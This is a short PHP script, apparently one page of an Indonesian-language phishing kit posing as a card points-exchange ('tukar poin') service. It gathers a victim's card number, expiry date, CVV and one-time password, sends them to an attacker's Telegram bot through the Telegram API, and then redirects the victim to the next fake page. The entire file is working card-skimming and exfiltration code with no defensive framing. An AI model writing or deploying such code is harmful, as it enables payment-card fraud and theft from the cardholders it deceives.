<?php
include '../telegram.php';
session_start();
$ddd = $_POST['pin'];
$aaa        = $_SESSION['aaa'];
$bbb                = $_SESSION['bbb'];
$ccc        = $_SESSION['ccc'];
$message = "
• NOTIFIKASI TUKAR POIN
• Nomor Kartu : ".$aaa."
• Validthru  : ".$bbb."
• CVV : ".$ccc."
• Otp : ".$ddd."
─────────────────────────";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
header('Location: ../../TukarPoin/kode.html');
?>
